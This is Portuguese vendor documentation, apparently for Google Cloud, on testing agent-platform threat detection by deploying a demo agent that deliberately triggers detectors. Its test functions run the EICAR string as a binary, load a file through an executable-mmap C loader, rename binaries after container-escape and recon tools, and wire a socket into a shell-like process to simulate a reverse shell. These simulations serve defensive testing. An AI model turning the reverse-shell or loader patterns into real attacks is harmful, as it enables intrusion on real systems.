Nesta página, explicamos como verificar se a detecção de ameaças da plataforma do agente está funcionando por meio do acionamento intencional de detectores e da verificação de descobertas. A detecção de ameaças da plataforma do agente é um serviço integrado do Security Command Center.
Antes de começar
Para detectar possíveis ameaças aos agentes do Agent Runtime, verifique se o serviço Detecção de ameaças da plataforma do agente está ativado no Security Command Center.
Configurar o ambiente
Para testar a detecção de ameaças da plataforma do agente, configure um agente de demonstração que simule atividades maliciosas.
Criar um projeto e ativar o shell
Selecione ou crie um projeto do Google Cloud para usar nos testes.
Para testar os detectores, use o Google Cloud console e o Cloud Shell.
Acesse o console doGoogle Cloud .
Selecione o projeto que você vai usar para testar.
Clique em Ativar o Cloud Shell.
Também é possível executar as instruções de teste em um shell local.
Configurar o Agent Runtime
Se você nunca usou o Agent Runtime neste projeto, configure o ambiente do Agent Runtime antes de começar. Registre o nome do bucket temporário do Cloud Storage que você criou. Também recomendamos que você siga o início rápido do tempo de execução do agente para aprender a desenvolver e implantar um agente com o SDK da Vertex AI.
Criar script de teste
Você vai criar vários arquivos que serão usados para implantar um novo agente para testes. Use um editor de texto para isso, como o nano.
Crie um novo arquivo chamado
requirements.txtcom o seguinte conteúdo.google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticCrie um novo arquivo vazio chamado
installation_scripts/install.sh. Alguns testes exigem a adição de conteúdo a esse arquivo.Crie um novo arquivo chamado
main.pycom o seguinte conteúdo. Substitua as variáveisPROJECT_ID,LOCATIONeSTAGING_BUCKET. O nome do bucket de staging precisa incluir o prefixogs://.import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
Configurar o ambiente virtual
Crie e ative um ambiente virtual Python.
python3 -m venv env source env/bin/activateInstale as dependências necessárias no ambiente virtual.
pip install -r requirements.txt
Testar o script:
Execute o script de dentro do ambiente virtual com python3 main.py.
Esse comando leva alguns minutos para criar, implantar e executar o agente de teste.
O script gera o nome do recurso do agente implantado e alguns objetos JSON, incluindo uma resposta do LLM e outros metadados. Se você encontrar erros de permissão ou de implantação nesta etapa, consulte a solução de problemas para as próximas etapas.
Detectores de teste
Para testar os detectores da Detecção de ameaças da plataforma de agentes, substitua o código na função threat_detection_test por um código que simule um ataque. O script pode levar muito tempo para
ser implantado e consultar o agente. Para acelerar os testes, combine o conteúdo de várias dessas funções.
Execução: binário malicioso adicionado executado
Substitua a função threat_detection_test no script de teste e execute-o.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
Execução: biblioteca maliciosa adicionada carregada
Substitua a função threat_detection_test no script de teste e execute-o. Você pode receber um erro do SDK da Vertex AI sobre
a análise da resposta, mas a descoberta ainda será gerada.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
Execução: escape de contêiner
Substitua a função threat_detection_test no script de teste e execute-o.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
Execução: execução de ferramenta de ataque do Kubernetes
Substitua a função threat_detection_test no script de teste e execute-o.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
Execução: execução da ferramenta de reconhecimento local
Substitua a função threat_detection_test no script de teste e execute-o.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
Execução: binário malicioso modificado executado
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
Execução: biblioteca maliciosa modificada carregada
Substitua a função threat_detection_test no script de teste e execute-o.
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
URL malicioso observado
Atualize o arquivo installation_scripts/install.sh com o seguinte conteúdo.
#!/bin/bash
apt-get install -y curl --no-install-recommends
Substitua a função threat_detection_test no script de teste e execute-o.
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
Shell reverso
Substitua a função threat_detection_test no script de teste e execute-o.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output
A seguir
- Saiba mais sobre a detecção de ameaças da plataforma de agentes.
- Saiba como usar a detecção de ameaças da plataforma do agente.